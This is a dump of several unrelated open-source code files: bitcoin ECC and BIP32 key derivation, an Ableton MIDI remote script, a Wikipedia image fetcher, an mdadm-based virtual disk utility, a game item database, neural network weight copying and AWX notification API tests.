return EC_KEY.encrypt_message(message, bfh(pubkey), magic)
def chunks(l, n):
return [l[i:i+n] for i in range(0, len(l), n)]
def ECC_YfromX(x,curved=curve_secp256k1, odd=True):
_p = curved.p()
_a = curved.a()
_b = curved.b()
for offset in range(128):
Mx = x + offset
My2 = pow(Mx, 3, _p) + _a * pow(Mx, 2, _p) + _b % _p
My = pow(My2, (_p+1)//4, _p )
if curved.contains_point(Mx,My):
if odd == bool(My&1):
return [My,offset]
return [_p-My,offset]
raise Exception('ECC_YfromX: No Y found')
def negative_point(P):
return Point( P.curve(), P.x(), -P.y(), P.order() )
def point_to_ser(P, comp=True ):
if comp:
return bfh( ('%02x'%(2+(P.y()&1)))+('%064x'%P.x()) )
return bfh( '04'+('%064x'%P.x())+('%064x'%P.y()) )
def ser_to_point(Aser):
curve = curve_secp256k1
generator = generator_secp256k1
_r = generator.order()
assert Aser[0] in [0x02, 0x03, 0x04]
if Aser[0] == 0x04:
return Point( curve, string_to_number(Aser[1:33]), string_to_number(Aser[33:]), _r )
Mx = string_to_number(Aser[1:])
return Point( curve, Mx, ECC_YfromX(Mx, curve, Aser[0] == 0x03)[0], _r )
class MyVerifyingKey(ecdsa.VerifyingKey):
@classmethod
def from_signature(klass, sig, recid, h, curve):
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf, chapter 4.1.6 """
from ecdsa import util, numbertheory
from . import msqr
curveFp = curve.curve
G = curve.generator
order = G.order()
# extract r,s from signature
r, s = util.sigdecode_string(sig, order)
# 1.1
x = r + (recid//2) * order
# 1.3
alpha = ( x * x * x + curveFp.a() * x + curveFp.b() ) % curveFp.p()
beta = msqr.modular_sqrt(alpha, curveFp.p())
y = beta if (beta - recid) % 2 == 0 else curveFp.p() - beta
# 1.4 the constructor checks that nR is at infinity
R = Point(curveFp, x, y, order)
# 1.5 compute e from message:
e = string_to_number(h)
minus_e = -e % order
# 1.6 compute Q = r^-1 (sR - eG)
inv_r = numbertheory.inverse_mod(r,order)
Q = inv_r * ( s * R + minus_e * G )
return klass.from_public_point( Q, curve )
def pubkey_from_signature(sig, h):
if len(sig) != 65:
raise Exception("Wrong encoding")
nV = sig[0]
if nV < 27 or nV >= 35:
raise Exception("Bad encoding")
if nV >= 31:
compressed = True
nV -= 4
else:
compressed = False
recid = nV - 27
return MyVerifyingKey.from_signature(sig[1:], recid, h, curve = SECP256k1), compressed
class MySigningKey(ecdsa.SigningKey):
"""Enforce low S values in signatures"""
def sign_number(self, number, entropy=None, k=None):
curve = SECP256k1
G = curve.generator
order = G.order()
r, s = ecdsa.SigningKey.sign_number(self, number, entropy, k)
if s > order//2:
s = order - s
return r, s
class EC_KEY(object):
def __init__( self, k ):
secret = string_to_number(k)
self.pubkey = ecdsa.ecdsa.Public_key( generator_secp256k1, generator_secp256k1 * secret )
self.privkey = ecdsa.ecdsa.Private_key( self.pubkey, secret )
self.secret = secret
def get_public_key(self, compressed=True):
return bh2u(point_to_ser(self.pubkey.point, compressed))
def sign(self, msg_hash):
private_key = MySigningKey.from_secret_exponent(self.secret, curve = SECP256k1)
public_key = private_key.get_verifying_key()
signature = private_key.sign_digest_deterministic(msg_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_string)
assert public_key.verify_digest(signature, msg_hash, sigdecode = ecdsa.util.sigdecode_string)
return signature
def sign_message(self, message, is_compressed):
message = to_bytes(message, 'utf8')
signature = self.sign(Hash(msg_magic(message)))
for i in range(4):
sig = bytes([27 + i + (4 if is_compressed else 0)]) + signature
try:
self.verify_message(sig, message)
return sig
except Exception as e:
continue
else:
raise Exception("error: cannot sign message")
def verify_message(self, sig, message):
assert_bytes(message)
h = Hash(msg_magic(message))
public_key, compressed = pubkey_from_signature(sig, h)
# check public key
if point_to_ser(public_key.pubkey.point, compressed) != point_to_ser(self.pubkey.point, compressed):
raise Exception("Bad signature")
# check message
public_key.verify_digest(sig[1:], h, sigdecode = ecdsa.util.sigdecode_string)
# ECIES encryption/decryption methods; AES-128-CBC with PKCS7 is used as the cipher; hmac-sha256 is used as the mac
@classmethod
def encrypt_message(self, message, pubkey, magic=b'BIE1'):
assert_bytes(message)
pk = ser_to_point(pubkey)
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, pk.x(), pk.y()):
raise Exception('invalid pubkey')
ephemeral_exponent = number_to_string(ecdsa.util.randrange(pow(2,256)), generator_secp256k1.order())
ephemeral = EC_KEY(ephemeral_exponent)
ecdh_key = point_to_ser(pk * ephemeral.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
ciphertext = aes_encrypt_with_iv(key_e, iv, message)
ephemeral_pubkey = bfh(ephemeral.get_public_key(compressed=True))
encrypted = magic + ephemeral_pubkey + ciphertext
mac = hmac.new(key_m, encrypted, hashlib.sha256).digest()
return base64.b64encode(encrypted + mac)
def decrypt_message(self, encrypted, magic=b'BIE1'):
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
raise Exception('invalid ciphertext: length')
magic_found = encrypted[:4]
ephemeral_pubkey = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic_found != magic:
raise Exception('invalid ciphertext: invalid magic bytes')
try:
ephemeral_pubkey = ser_to_point(ephemeral_pubkey)
except AssertionError as e:
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, ephemeral_pubkey.x(), ephemeral_pubkey.y()):
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
ecdh_key = point_to_ser(ephemeral_pubkey * self.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac.new(key_m, encrypted[:-32], hashlib.sha256).digest():
raise InvalidPassword()
return aes_decrypt_with_iv(key_e, iv, ciphertext)
###################################### BIP32 ##############################
random_seed = lambda n: "%032x"%ecdsa.util.randrange( pow(2,n) )
BIP32_PRIME = 0x80000000
def get_pubkeys_from_secret(secret):
# public key
private_key = ecdsa.SigningKey.from_string( secret, curve = SECP256k1 )
public_key = private_key.get_verifying_key()
K = public_key.to_string()
K_compressed = GetPubKey(public_key.pubkey,True)
return K, K_compressed
# Child private key derivation function (from master private key)
# k = master private key (32 bytes)
# c = master chain code (extra entropy for key derivation) (32 bytes)
# n = the index of the key we want to derive. (only 32 bits will be used)
# If n is negative (i.e. the 32nd bit is set), the resulting private key's
# corresponding public key can NOT be determined without the master private key.
# However, if n is positive, the resulting private key's corresponding
# public key can be determined without the master private key.
def CKD_priv(k, c, n):
is_prime = n & BIP32_PRIME
return _CKD_priv(k, c, bfh(rev_hex(int_to_hex(n,4))), is_prime)
def _CKD_priv(k, c, s, is_prime):
order = generator_secp256k1.order()
keypair = EC_KEY(k)
cK = GetPubKey(keypair.pubkey,True)
data = bytes([0]) + k + s if is_prime else cK + s
I = hmac.new(c, data, hashlib.sha512).digest()
k_n = number_to_string( (string_to_number(I[0:32]) + string_to_number(k)) % order , order )
c_n = I[32:]
return k_n, c_n
# Child public key derivation function (from public key only)
# K = master public key
# c = master chain code
# n = index of key we want to derive
# This function allows us to find the nth public key, as long as n is
# non-negative. If n is negative, we need the master private key to find it.
def CKD_pub(cK, c, n):
if n & BIP32_PRIME: raise
return _CKD_pub(cK, c, bfh(rev_hex(int_to_hex(n,4))))
# helper function, callable with arbitrary string
def _CKD_pub(cK, c, s):
order = generator_secp256k1.order()
I = hmac.new(c, cK + s, hashlib.sha512).digest()
curve = SECP256k1
pubkey_point = string_to_number(I[0:32])*curve.generator + ser_to_point(cK)
public_key = ecdsa.VerifyingKey.from_public_point( pubkey_point, curve = SECP256k1 )
c_n = I[32:]
cK_n = GetPubKey(public_key.pubkey,True)
return cK_n, c_n
def xprv_header(xtype):
return bfh("%08x" % NetworkConstants.XPRV_HEADERS[xtype])
def xpub_header(xtype):
return bfh("%08x" % NetworkConstants.XPUB_HEADERS[xtype])
def serialize_xprv(xtype, c, k, depth=0, fingerprint=b'\x00'*4, child_number=b'\x00'*4):
xprv = xprv_header(xtype) + bytes([depth]) + fingerprint + child_number + c + bytes([0]) + k
return EncodeBase58Check(xprv)
def serialize_xpub(xtype, c, cK, depth=0, fingerprint=b'\x00'*4, child_number=b'\x00'*4):
xpub = xpub_header(xtype) + bytes([depth]) + fingerprint + child_number + c + cK
return EncodeBase58Check(xpub)
def deserialize_xkey(xkey, prv):
xkey = DecodeBase58Check(xkey)
if len(xkey) != 78:
raise BaseException('Invalid length')
depth = xkey[4]
fingerprint = xkey[5:9]
child_number = xkey[9:13]
c = xkey[13:13+32]
header = int('0x' + bh2u(xkey[0:4]), 16)
headers = NetworkConstants.XPRV_HEADERS if prv else NetworkConstants.XPUB_HEADERS
if header not in headers.values():
raise BaseException('Invalid xpub format', hex(header))
xtype = list(headers.keys())[list(headers.values()).index(header)]
n = 33 if prv else 32
K_or_k = xkey[13+n:]
return xtype, depth, fingerprint, child_number, c, K_or_k
def deserialize_xpub(xkey):
return deserialize_xkey(xkey, False)
def deserialize_xprv(xkey):
return deserialize_xkey(xkey, True)
def xpub_type(x):
return deserialize_xpub(x)[0]
def is_xpub(text):
try:
deserialize_xpub(text)
return True
except:
return False
def is_xprv(text):
try:
deserialize_xprv(text)
return True
except:
return False
def xpub_from_xprv(xprv):
xtype, depth, fingerprint, child_number, c, k = deserialize_xprv(xprv)
K, cK = get_pubkeys_from_secret(k)
return serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
def bip32_root(seed, xtype):
I = hmac.new(b"Bitcoin seed", seed, hashlib.sha512).digest()
master_k = I[0:32]
master_c = I[32:]
K, cK = get_pubkeys_from_secret(master_k)
xprv = serialize_xprv(xtype, master_c, master_k)
xpub = serialize_xpub(xtype, master_c, cK)
return xprv, xpub
def xpub_from_pubkey(xtype, cK):
assert cK[0] in [0x02, 0x03]
return serialize_xpub(xtype, b'\x00'*32, cK)
def bip32_derivation(s):
assert s.startswith('m/')
s = s[2:]
for n in s.split('/'):
if n == '': continue
i = int(n[:-1]) + BIP32_PRIME if n[-1] == "'" else int(n)
yield i
def is_bip32_derivation(x):
try:
[ i for i in bip32_derivation(x)]
return True
except :
return False
def bip32_private_derivation(xprv, branch, sequence):
assert sequence.startswith(branch)
if branch == sequence:
return xprv, xpub_from_xprv(xprv)
xtype, depth, fingerprint, child_number, c, k = deserialize_xprv(xprv)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n[:-1]) + BIP32_PRIME if n[-1] == "'" else int(n)
parent_k = k
k, c = CKD_priv(k, c, i)
depth += 1
_, parent_cK = get_pubkeys_from_secret(parent_k)
fingerprint = hash_160(parent_cK)[0:4]
child_number = bfh("%08X"%i)
K, cK = get_pubkeys_from_secret(k)
xpub = serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
xprv = serialize_xprv(xtype, c, k, depth, fingerprint, child_number)
return xprv, xpub
def bip32_public_derivation(xpub, branch, sequence):
xtype, depth, fingerprint, child_number, c, cK = deserialize_xpub(xpub)
assert sequence.startswith(branch)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n)
parent_cK = cK
cK, c = CKD_pub(cK, c, i)
depth += 1
fingerprint = hash_160(parent_cK)[0:4]
child_number = bfh("%08X"%i)
return serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
def bip32_private_key(sequence, k, chain):
for i in sequence:
k, chain = CKD_priv(k, chain, i)
return k
| mit | -8,091,787,089,612,618,000 | 30.569392 | 133 | 0.616814 | false |
jim-cooley/abletonremotescripts | remote-scripts/branches/VCM600_XL/DeviceComponent.py | 1 | 2728 | #Embedded file name: /Users/versonator/Jenkins/live/Binary/Core_Release_64_static/midi-remote-scripts/Launch_Control_XL/DeviceComponent.py
import Live
from _Framework.Control import control_list, ButtonControl
from _Framework.DeviceComponent import DeviceComponent as DeviceComponentBase
from _Framework.ModesComponent import EnablingModesComponent, tomode
class DeviceComponent(DeviceComponentBase):
parameter_lights = control_list(ButtonControl, control_count=8, enabled=False, color='Device.Parameters', disabled_color='Device.NoDevice')
prev_device_button = ButtonControl(color='DefaultButton.On')
next_device_button = ButtonControl(color='DefaultButton.On')
@prev_device_button.pressed
def prev_device_button(self, button):
self._scroll_device_view(Live.Application.Application.View.NavDirection.left)
@next_device_button.pressed
def next_device_button(self, button):
self._scroll_device_view(Live.Application.Application.View.NavDirection.right)
def _scroll_device_view(self, direction):
self.application().view.show_view('Detail')
self.application().view.show_view('Detail/DeviceChain')
self.application().view.scroll_view(direction, 'Detail/DeviceChain', False)
def set_device(self, device):
super(DeviceComponent, self).set_device(device)
for light in self.parameter_lights:
light.enabled = bool(device)
def set_bank_buttons(self, buttons):
for button in buttons or []:
if button:
button.set_on_off_values('Device.BankSelected', 'Device.BankUnselected')
super(DeviceComponent, self).set_bank_buttons(buttons)
def _is_banking_enabled(self):
return True
class DeviceModeComponent(EnablingModesComponent):
device_mode_button = ButtonControl()
def __init__(self, device_settings_mode = None, *a, **k):
super(DeviceModeComponent, self).__init__(*a, **k)
raise device_settings_mode is not None or AssertionError
self._device_settings_mode = tomode(device_settings_mode)
@device_mode_button.released_immediately
def device_mode_button(self, button):
self.cycle_mode()
@device_mode_button.pressed_delayed
def device_mode_button(self, button):
self.selected_mode = 'enabled'
self._device_settings_mode.enter_mode()
@device_mode_button.released_delayed
def device_mode_button(self, button):
self._device_settings_mode.leave_mode()
def _update_buttons(self, selected_mode):
self.device_mode_button.color = 'DefaultButton.On' if selected_mode == 'enabled' else 'DefaultButton.Off'
super(DeviceModeComponent, self)._update_buttons(selected_mode) | apache-2.0 | -9,198,484,748,923,867,000 | 41.640625 | 143 | 0.715176 | false |
cscott/wikiserver | OLD/tools/get_images.py | 1 | 9366 | from __future__ import with_statement
import re
#import server
import md5
import urllib
import collections
import os
import subprocess
BASEWORD = r"Image"
BASE_URL="http://upload.wikimedia.org/wikipedia/commons"
def get_source_url(filename):
return "%s/%s" % (BASE_URL, get_endpath(filename))
def get_dirs(filename):
m = md5.new()
m.update(filename)
h = m.hexdigest()
return (h[0], h[:2])
def get_endpath(filename):
d = get_dirs(filename)
p = "%s/%s/%s" % (d[0], d[1], filename)
return p
def canonicalize_filename(wikiname):
wikiname = wikiname.replace(' ', '_')
wikiname = wikiname[0].upper() + wikiname[1:]
return wikiname
class WorkaroundURLopener(urllib.FancyURLopener):
version = "OLPC_wikislicer/0.1"
urllib._urlopener = WorkaroundURLopener()
def download_image(filename, base_dir):
source = get_source_url(filename)
dirs = get_dirs(filename)
destdir = "%s/%s/%s" % (base_dir, dirs[0], dirs[1])
try:
os.makedirs(destdir)
except:
pass #This just means that destdir already exists
dest = "%s/%s" % (destdir, filename)
try:
urllib.urlretrieve(source,dest)
except:
print "Failed to download " + source
return False
return dest
def make_svg_wrapper(name, width, height):
s = '<svg xmlns="http://www.w3.org/2000/svg" version="1.2" xmlns:xlink="http://www.w3.org/1999/xlink" width="%(width)i" height="%(height)i" viewbox="0 0 %(width)i %(height)i"><image xlink:href="%(name)s" width="100%%" height="100%%" x="0" y="0"/></svg>' % {'name':name, 'width':width, 'height':height }
return s
def get_dims(path):
try:
p = subprocess.Popen(['identify','-format','%wx%h',path],stdout=subprocess.PIPE)
p.wait()
s = p.stdout.read()
l = s.split('x')
return (int(l[0]), int(l[1]))
except:
print "Failed to get dims"
return False
def download_and_process(imgdict, base_dir, thumb_width):
for wikiname in imgdict:
filename = canonicalize_filename(wikiname)
d = download_image(filename, base_dir)
if d:
width = None
height= None
for p in imgdict[wikiname]:
if p.width is not None:
width = max(width, p.width)
elif p.thumbnail:
width = max(width, thumb_width)
if p.height is not None:
height = max(height, p.height)
process_image(filename, width, height)
MAXWIDTH=800
MAXHEIGHT=800
def process_image(d, width=None, height=None):
vector = d[-3:].upper() == 'SVG'
if vector:
try:
jpg_name = d + '.jpg'
rsvg_command = ['rsvg-convert','--keep-aspect-ratio','--format=png','--output', jpg_name]
if width is not None:
rsvg_command.append('--width=%i' % width)
if height is not None:
rsvg_command.append('--height=%i' %height)
rsvg_command.append(d)
subprocess.check_call(rsvg_command)
#jpg_name file now contains a png image; we want jpg to save space
subprocess.check_call(['convert', "PNG:%s" % jpg_name, "-quality", "20", "JPEG:%s" % jpg_name])
(width, height) = get_dims(jpg_name)
svg_factor = 0.3 #favorability of SVG
print "Processing vector image " + d
jpg_size = os.stat(jpg_name).st_size
svg_size = svg_factor * os.stat(d).st_size
if svg_size > jpg_size:
print "Replacing svg by a raster wrapper"
endname = jpg_name.split('/')[-1]
s = make_svg_wrapper(endname, width, height)
f = open(d,'w')
f.write(s)
f.truncate()
f.close()
return jpg_size + os.stat(d).st_size
else:
print "Preserving svg as vector"
os.remove(jpg_name)
return os.stat(d).st_size
except:
print "Error: convert failed on " + d
try:
os.remove(d)
os.remove(jpg_name)
except:
print "Error: failed to remove " + d
return 0
else:
print "Processing raster image " + d
try:
if width is None:
width = MAXWIDTH
if height is None:
height = MAXHEIGHT
newsize = "%ix%i>" % (width, height)
subprocess.check_call(['convert', d,"-flatten", "-resize", newsize, "-quality", "20", "JPEG:%s" % d])
print "Succesfully resized " + d
return os.stat(d).st_size
except:
print "Error: convert failed on " + d
try:
os.remove(d)
except:
print "Error: failed to remove " + d
return 0
def process_imagelist(list_filename, base_dir, imgword, maxsize=float('inf')):
with open(list_filename) as f:
print "opened " + list_filename
totalsize = 0 #bytes
searcher = r"\[\[(?:%s|%s):(.+?)\]\]\s+(\d+)\s+(.*?)\s+(.*?)$" % (BASEWORD, imgword)
print searcher
for line in f.readlines():
m = re.search(searcher, line)
if m is None:
print "WARNING: Match didn't work on " + line
wikiname = m.group(1)
hits = m.group(2)
width = m.group(3)
height = m.group(4)
print wikiname, hits, width, height
if width == 'None':
width = None
else:
width = int(width)
if height == 'None':
height = None
else:
height = int(height)
filename = canonicalize_filename(wikiname)
d = download_image(filename, base_dir)
if d:
s = process_image(d, width, height)
totalsize += s
print d + " occupies " + str(s) + " bytes; running total is " + str(totalsize)
if totalsize > maxsize:
break
class ImageProps:
thumbnail = False
width = None
height = None
upright = False
def __repr__(self):
return "%s (%s, %s) %s" % (self.thumbnail, self.width, self.height, self.upright)
class ImageFinder:
def __init__(self, image_word):
self.word = image_word
self.db = server.WPWikiDB()
def find_images(self, text):
L = []
#pattern = r"\[\[(?:%s|%s):(?P<filename>[^\|\]]+)(?:\|(?P<type>thumb|thumbnail)|(?P<width>\d+)(?:x(?P<height>\d+))?px|(?P<upright>upright)|(?:[^\|\[\]]|\[[^\|\[\]]*\]|\[\[[^\|\[\]]*\]\])*)*\]\]" % (BASEWORD, self.word)
#pattern = r"\[\[(?:%s|%s):(?P<filename>[^\|\]]+)(?P<options>(?:[^\[\]]|\[[^\[\]]*\]|\[\[[^\[\]]*\]\])*)\]\]" % (BASEWORD, self.word)
pattern = r"\[\[(?:%s|%s):\s*(?P<filename>[^\|\]]+?)\s*(?:\|(?P<options>(?:[^\[\]]|\[[^\[\]]*\]|\[\[[^\[\]]*\]\])*))?\]\]" % (BASEWORD, self.word)
for match in re.finditer(pattern, text):
if match:
#d = match.groupdict(None)
f = match.group('filename')
p = ImageProps()
for s in match.group('options').split('|'):
if s == 'thumb' or s == 'thumbnail':
p.thumbnail = True
elif s == 'upright':
p.upright = False
elif s[-2:] == 'px':
dims = s[:-2].split('x')
if len(dims) > 0:
p.width = int(dims[0])
if len(dims) > 1:
p.height = int(dims[1])
print (f,p)
L.append((f,p))
return L
def get_images_info(self, title):
text = self.db.getExpandedArticle(title)
return self.find_images(text)
def list_images(self, title):
props = self.get_images_info(title)
filenames = [t[0] for t in props]
return filenames
def get_metadata_all(self, titles):
d = collections.defaultdict(list)
for t in titles:
L = self.get_images_info(t)
for (fname, props) in L:
d[fname].append(props)
return d
def read_links(index):
f = open(index)
text = f.read()
f.close()
titles = []
for match in re.finditer('href\s*=\s*[\'\"]/wiki/([^\'\"]+)[\'\"]', text):
if match:
titles.append(match.group(1))
return titles
def main_task(db_path, indexfile, image_word, base_dir, thumb_width):
titles = read_links(indexfile)
print titles
server.load_db(db_path)
p = ImageFinder(image_word)
m = p.get_metadata_all(titles)
print m
download_and_process(m, base_dir, thumb_width)
#main_task("/home/olpc/40ormore.xml.bz2", "../static/index.html", "Imagen", "/home/olpc/images", 180)
process_imagelist("top70k_images", "../es_PE/images", "Imagen", 23000000)
| gpl-2.0 | 3,602,485,294,776,905,700 | 35.023077 | 306 | 0.494768 | false |
erikbodzsar/fraid | fraid.py | 1 | 7062 | #!/usr/bin/python
"""
fraid utility to create virtual disks
that are distributed on multiple physical disks.
"""
from os import listdir, path, mkdir, access, F_OK, devnull, remove, getuid
from subprocess import check_output, PIPE, Popen
from re import match
try:
check_output(["mdadm" ,"--help"])
except OSError:
print "mdadm package must be installed!"
quit()
if getuid() != 0:
print "this script needs to be run as root!"
quit()
CONFIG_DIR = "/etc/fraid"
if not access(CONFIG_DIR, F_OK):
mkdir(CONFIG_DIR)
check_output(["modprobe", "loop"])
DEV_NULL = open(devnull, "w")
def usage():
"""
Prints usage info.
"""
print "Commands:"
print " list : list current fraids"
print \
" create name size dirs... : create a new fraid called name,\n" + \
" "*29 + "with a per-file capacity of size GB,\n" + \
" "*29 + "storing files in the directories specified by dirs"
print " up name : create the device /dev/md/name for fraid name"
print " down name : remote the md and loop devices corresponding to name"
print " delete name : delete the files and metadata of fraid name"
print " quit : quit fraid"
def get_loops():
"""
Returns a dictionary that maps files to loop devices.
"""
def parse_loop_dev(line):
"""
Parses a losetup -a output line into a (file, loopdevice) tuple.
"""
end_of_dev = line.find(':')
start_of_file = line.rfind('(')
return (line[start_of_file+1:-1], line[0:end_of_dev])
return dict(map(parse_loop_dev,
check_output(["losetup", "-a"]).splitlines()))
def create_loops(filenames):
"""
Create or identifies loop devices corresponding to files.
Returns a list of the loop devices.
"""
current = get_loops()
def create_loop(filename):
"""
Creates or identifies a loop device corresponding to a file.
"""
if file in current:
return current[filename]
else:
return check_output(["losetup", "-f", "--show", filename]).rstrip()
return map(create_loop, filenames)
def read_dirs_from_config(config):
"""
Returns a list of the directories of a fraid.
"""
return open(CONFIG_DIR+"/"+config, "r").read().splitlines()
def read_files_from_config(name):
"""
Returns a list of the files of a fraid.
"""
return [d+"/"+name+".fdisk" for d in read_dirs_from_config(name)]
def active_mds():
"""
Returns a list of the active mds.
"""
try:
return listdir("/dev/md")
except:
return []
def current_fraids():
"""
Returns a list of the created fraids.
"""
return listdir(CONFIG_DIR)
def fraid_exists(name):
"""
Checks if a fraid already exists.
"""
return name in current_fraids()
def activate_fraid(name):
"""
Create necessary loops for a fraid and then create the md device.
"""
loops = create_loops(read_files_from_config(name))
mdproc = Popen(["mdadm", "--create", "/dev/md/"+name,
"--level=0", "--raid-devices="+str(len(loops))] + loops,
stdin=PIPE, stdout=DEV_NULL, stderr=DEV_NULL)
mdproc.communicate("y")
mdproc.wait()
print "device for fraid", name, "created at /dev/md/"+name
def ask_user(question):
"""
Ask user a yes/no question and return answer as a boolean.
"""
while True:
ans = raw_input(question + " [y/n] ")
if ans == "y" or ans == "n":
return ans == "y"
def create_fraid(name, size, dirs):
"""
Create metadata and files for fraid name.
"""
def create_file_bg(directory):
"""
Create the fraid file in a background process.
"""
return Popen(
["dd", "if=/dev/zero", "of="+directory+"/"+name+".fdisk",
"bs=1G", "count="+str(size)], stderr=DEV_NULL)
with open(CONFIG_DIR+"/"+name, "w") as fraidfile:
for directory in dirs:
fraidfile.write(directory+"\n")
for proc in map(create_file_bg, dirs):
proc.wait()
def main():
"""
Command handling loop.
"""
while True:
cmds = raw_input("> ").rstrip().split(" ")
cmd = cmds[0]
args = cmds[1:]
if cmd == "quit":
break
elif cmd == "list":
active = set(active_mds())
for fraid in current_fraids():
files = read_files_from_config(fraid)
print fraid, "[ACTIVE]" if fraid in active else "[INACTIVE]", \
path.getsize(files[0])*len(files)/pow(10, 9), "GB"
for filename in files:
print " ", filename
elif cmd == "up":
name = args[0]
if name in active_mds():
print name, "is already active!"
continue
activate_fraid(name)
elif cmd == "down":
name = args[0]
if not name in current_fraids():
print name, "is not a fraid!"
continue
if not name in active_mds():
print name, "is not active!"
continue
check_output(["mdadm", "--stop", "/dev/md/"+name], stderr=DEV_NULL)
loops = get_loops()
for dev in [loops[f] for f in read_files_from_config(name)]:
check_output(["losetup", "-d", dev])
elif cmd == "create":
if len(args) < 3:
print "Usage: create size dirs..."
continue
name = args[0]
if not match(r'^[A-Za-z0-9_]+$', name):
print name, "is not a valid fraid name! " \
"Please only use alphanumerics and underscores."
continue
if fraid_exists(name):
print name, "already exists!"
continue
size = 0
if args[1].isdigit() and int(args[1]) > 0:
size = int(args[1])
else:
print "size (" + args[1] + ") is not a positive integer!"
continue
dirs = args[2:]
if len(dirs) != len(set(dirs)):
print "directory list has duplicates!"
continue
create_fraid(name, size, dirs)
activate_fraid(name)
elif cmd == "delete":
name = args[0]
if not fraid_exists(name):
print name, "doesn't exist!"
continue
if name in active_mds():
print name, "is active! do down", name, "first!"
continue
if ask_user("Are you sure you want to delete " + name + \
" and ALL corresponding files?"):
for filename in read_files_from_config(name):
remove(filename)
remove(CONFIG_DIR+"/"+name)
else:
usage()
if __name__ == "__main__":
main()
| mit | -1,271,671,296,261,225,200 | 28.797468 | 79 | 0.52648 | false |
henriquegemignani/randovania | randovania/game_description/item/item_database.py | 1 | 2137 | from dataclasses import dataclass
from typing import Dict, Tuple
from randovania.game_description.item.ammo import Ammo
from randovania.game_description.item.item_category import ItemCategory
from randovania.game_description.item.major_item import MajorItem
@dataclass(frozen=True)
class ItemDatabase:
major_items: Dict[str, MajorItem]
ammo: Dict[str, Ammo]
default_items: Dict[ItemCategory, Tuple[MajorItem, ...]]
def read_database(major_items_data: Dict,
ammo_data: Dict,
) -> ItemDatabase:
"""
:param major_items_data:
:param ammo_data:
:return:
"""
major_items = {
name: MajorItem.from_json(name, value)
for name, value in major_items_data["items"].items()
}
ammo = {
name: Ammo.from_json(name, value)
for name, value in ammo_data.items()
}
default_items = {
ItemCategory(category_name): tuple(major_items[item_name] for item_name in value)
for category_name, value in major_items_data["default_items"].items()
}
return ItemDatabase(major_items, ammo, default_items)
def write_database(database: ItemDatabase,
) -> Tuple[Dict, Dict]:
"""
:param database:
:return:
"""
major_items_data = {
name: item.as_json
for name, item in database.major_items.items()
}
ammo_data = {
name: ammo.as_json
for name, ammo in database.ammo.items()
}
default_data = {
category.value: [item.name for item in items]
for category, items in database.default_items.items()
}
return {"items": major_items_data, "default_items": default_data}, ammo_data
_TEMPLE_KEYS = ["Dark Agon Key", "Dark Torvus Key", "Ing Hive Key"]
def add_memo_data_keys(data: dict):
for i in range(1, 4):
for temple_key in _TEMPLE_KEYS:
data["{} {}".format(temple_key, i)] = data[temple_key]
for temple_key in _TEMPLE_KEYS:
data.pop(temple_key)
for i in range(1, 10):
data["Sky Temple Key {}".format(i)] = data["Sky Temple Key"]
data.pop("Sky Temple Key")
| gpl-3.0 | 4,753,134,319,902,174,000 | 25.382716 | 89 | 0.620028 | false |
start-jsk/jsk_apc | demos/selective_dualarm_stowing/python/selective_dualarm_stowing/utils/copy_chainermodel.py | 2 | 1611 | #!/usr/bin/env python
from ..models import BVLCAlex
import chainer
import fcn
def copy_alex_chainermodel(chainermodel_path, model):
bvlc_model = BVLCAlex()
chainer.serializers.load_hdf5(chainermodel_path, bvlc_model)
for link in bvlc_model.children():
link_name = link.name
if link_name.startswith('fc'):
continue
if getattr(model, link_name):
layer = getattr(model, link_name)
if layer.W.data.shape == link.W.data.shape:
layer.W.data = link.W.data
else:
print('link_name {0} has different shape {1} != {2}'.format(
link_name, layer.W.data.shape, link.W.data.shape))
def copy_vgg16_chainermodel(model):
vgg16_model = fcn.models.VGG16()
vgg16_path = vgg16_model.download()
chainer.serializers.load_npz(vgg16_path, vgg16_model)
for l in vgg16_model.children():
if l.name.startswith('conv'):
l1 = getattr(vgg16_model, l.name)
l2 = getattr(model, l.name)
assert l1.W.shape == l2.W.shape
assert l1.b.shape == l2.b.shape
l2.W.data[...] = l1.W.data[...]
l2.b.data[...] = l1.b.data[...]
elif l.name in ['fc6', 'fc7']:
if not hasattr(model, l.name):
continue
l1 = getattr(vgg16_model, l.name)
l2 = getattr(model, l.name)
if l1.W.size == l2.W.size and l1.b.size == l2.b.size:
l2.W.data[...] = l1.W.data.reshape(l2.W.shape)[...]
l2.b.data[...] = l1.b.data.reshape(l2.b.shape)[...]
| bsd-3-clause | 6,453,309,216,593,481,000 | 36.465116 | 76 | 0.55059 | false |
GoogleCloudPlatform/sap-deployment-automation | third_party/github.com/ansible/awx/awx/main/tests/functional/test_notifications.py | 1 | 6814 | from unittest import mock
import pytest
from requests.adapters import HTTPAdapter
from requests.utils import select_proxy
from requests.exceptions import ConnectionError
from awx.api.versioning import reverse
from awx.main.models.notifications import NotificationTemplate, Notification
from awx.main.models.inventory import Inventory, InventorySource
from awx.main.models.jobs import JobTemplate
@pytest.mark.django_db
def test_get_notification_template_list(get, user, notification_template):
url = reverse('api:notification_template_list')
response = get(url, user('admin', True))
assert response.status_code == 200
assert len(response.data['results']) == 1
@pytest.mark.django_db
def test_basic_parameterization(get, post, user, organization):
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
response = post(url,
dict(name="test-webhook",
description="test webhook",
organization=organization.id,
notification_type="webhook",
notification_configuration=dict(url="http://localhost", disable_ssl_verification=False,
headers={"Test": "Header"})),
u)
assert response.status_code == 201
url = reverse('api:notification_template_detail', kwargs={'pk': response.data['id']})
response = get(url, u)
assert 'related' in response.data
assert 'organization' in response.data['related']
assert 'summary_fields' in response.data
assert 'organization' in response.data['summary_fields']
